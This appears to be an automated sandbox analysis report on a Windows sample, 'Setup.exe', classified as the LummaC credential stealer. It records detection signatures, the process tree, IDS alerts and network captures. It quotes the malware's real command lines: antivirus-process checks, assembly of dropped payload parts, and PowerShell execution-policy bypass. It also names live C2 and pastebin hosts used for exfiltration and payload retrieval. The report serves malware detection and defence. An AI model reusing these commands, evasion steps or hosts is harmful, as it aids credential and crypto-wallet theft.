Windows Analysis Report
'Setup.exe

Overview

General Information

Sample name: 'Setup.exe
Analysis ID: 1565284
MD5: b00b38068b134113eb53676c33a59a93
SHA1: 91a7780b1e6e8600c119abe8b49412bc4234751b
SHA256: 5a4692e821ef88f689144312c8f273d7e1599d44e8a26952ff7b9f62c4138f02
Tags: exe, user-aachum

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 'Setup.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\'Setup.exe" MD5: B00B38068B134113EB53676C33A59A93)
    • cmd.exe (PID: 5068 cmdline: "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5800 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4028 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2180 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3252 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2876 cmdline: cmd /c md 108941 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 5988 cmdline: cmd /c copy /b ..\Lines + ..\Edmonton + ..\Characterization + ..\Tampa + ..\Poet + ..\Artwork + ..\Butts + ..\Harbor A MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Contrast.com (PID: 6180 cmdline: Contrast.com A MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • powershell.exe (PID: 980 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 6208 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • powershell.exe (PID: 3500 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\5TM3JMZQCYKEYRKL75T8.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 6392 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware configuration (LummaC): {"C2 url": ["lumdexibuy.shop"]}

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Contrast.com PID: 6180 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: powershell.exe PID: 980 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
  • 0x2174f3:$b3: ::UTF8.GetString(
  • 0x10782c:$s1: -join
  • 0x10950d:$s1: -join
  • 0x1ae113:$s1: -join
  • 0x1bb1e8:$s1: -join
  • 0x1be5ba:$s1: -join
  • 0x1bec6c:$s1: -join
  • 0x1c075d:$s1: -join
  • 0x1c2963:$s1: -join
  • 0x1c318a:$s1: -join
  • 0x1c39fa:$s1: -join
  • 0x1c4135:$s1: -join
  • 0x1c4167:$s1: -join
  • 0x1c41af:$s1: -join
  • 0x1c41ce:$s1: -join
  • 0x1c4a1e:$s1: -join
  • 0x1c4b9a:$s1: -join
  • 0x1c4c12:$s1: -join
  • 0x1c4ca5:$s1: -join
  • 0x1c4f0b:$s1: -join
  • 0x1c70a1:$s1: -join
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
amsi32_980.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | Strings:
  • 0x2ab:$b3: ::UTF8.GetString(
  • 0x9f47:$s1: -join
  • 0x36f3:$s4: +=
  • 0x37b5:$s4: +=
  • 0x79dc:$s4: +=
  • 0x9af9:$s4: +=
  • 0x9de3:$s4: +=
  • 0x9f29:$s4: +=
  • 0x37a3a:$s4: +=
  • 0x37aba:$s4: +=
  • 0x37b80:$s4: +=
  • 0x37c00:$s4: +=
  • 0x37dd6:$s4: +=
  • 0x37e5a:$s4: +=
  • 0x245:$e1: System.Diagnostics.Process

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Contrast.com A, ParentImage: C:\Users\user\AppData\Local\Temp\108941\Contrast.com, ParentProcessId: 6180, ParentProcessName: Contrast.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", ProcessId: 980, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Contrast.com A, ParentImage: C:\Users\user\AppData\Local\Temp\108941\Contrast.com, ParentProcessId: 6180, ParentProcessName: Contrast.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", ProcessId: 980, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Contrast.com A, ParentImage: C:\Users\user\AppData\Local\Temp\108941\Contrast.com, ParentProcessId: 6180, ParentProcessName: Contrast.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", ProcessId: 980, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\'Setup.exe", ParentImage: C:\Users\user\Desktop\'Setup.exe, ParentProcessId: 7132, ParentProcessName: 'Setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd, ProcessId: 5068, ProcessName: cmd.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Contrast.com A, ParentImage: C:\Users\user\AppData\Local\Temp\108941\Contrast.com, ParentProcessId: 6180, ParentProcessName: Contrast.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1", ProcessId: 980, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5068, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3252, ProcessName: findstr.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:12:37.057575+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49754 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:40.949212+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49764 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:45.509385+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49775 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:49.811182+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49786 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:54.229858+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49797 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:58.720720+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49809 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:02.934746+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49819 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:06.798162+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49826 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:11.123645+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49837 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:15.518575+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49848 | 104.20.4.235 | 443 | TCP
2024-11-29T15:13:18.026067+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49854 | 104.21.58.9 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:12:39.594075+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49754 | 104.21.63.229 | 443 | TCP
2024-11-29T15:12:43.897693+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49764 | 104.21.63.229 | 443 | TCP
2024-11-29T15:13:14.067850+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49837 | 104.21.63.229 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:12:39.594075+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49754 | 104.21.63.229 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:12:43.897693+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49764 | 104.21.63.229 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T15:13:05.438371+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49819 | 104.21.63.229 | 443 | TCP

            AV Detection

Source: https://silversky.club/4b882c8/script; Avira URL Cloud: Label: malware
Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: LummaC {"C2 url": ["lumdexibuy.shop"]}
Source: 'Setup.exe; ReversingLabs: Detection: 13%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 84.9% probability
Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmp; String decryptor: lumdexibuy.shop
Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmp; String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmp; String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmp; String decryptor: - Screen Resoluton:
Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmp; String decryptor: - Physical Installed Memory:
Source: 0000000A.00000003.2403306316.0000000004581000.00000004.00000800.00020000.00000000.sdmp; String decryptor: Workgroup: -
Source: 'Setup.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49837 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49848 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.58.9:443 -> 192.168.2.5:49854 version: TLS 1.2
Source: 'Setup.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb; source: powershell.exe, 00000011.00000002.2866405600.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbw; source: powershell.exe, 00000011.00000002.2880384967.00000000075F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb; source: powershell.exe, 00000011.00000002.2880384967.00000000075F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb%; source: powershell.exe, 00000011.00000002.2866405600.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb; source: powershell.exe, 00000011.00000002.2866405600.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\'Setup.exe; Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\'Setup.exe; Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com; Code function: 10_2_00574005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00574005
Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com; Code function: 10_2_0057C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0057C2FF
Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com; Code function: 10_2_0057494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_0057494A
Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com; Code function: 10_2_0057CD14 FindFirstFileW,FindClose,10_2_0057CD14
Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com; Code function: 10_2_0057CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0057CD9F
Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com; Code function: 10_2_0057F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0057F5D8
Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com; Code function: 10_2_0057F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0057F735
Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com; Code function: 10_2_0057FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0057FA36
Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.com; Code function: 10_2_00573CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00573CE2
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\108941
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Temp\108941\

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49754 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49754 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49764 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49764 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49819 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49837 -> 104.21.63.229:443
            Source: Malware configuration extractorURLs: lumdexibuy.shop
            Source: unknownDNS query: name: pastebin.com
            Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
            Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49754 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49764 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49797 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49819 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49775 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49826 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49809 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49786 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49837 -> 104.21.63.229:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49848 -> 104.20.4.235:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49854 -> 104.21.58.9:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 79Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PZGP4FN1MNJNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12799Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4SWC7R2U0LS2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15041Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=082MXLHK4KN3NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20537Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YQUFHPP0DGAK0AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7064Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HX3TOI8KOQNOLIDMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1214Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PTOPGS84MNK72User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1105Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 114Host: lumdexibuy.shop
            Source: global trafficHTTP traffic detected: GET /raw/erLX7UsT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: pastebin.com
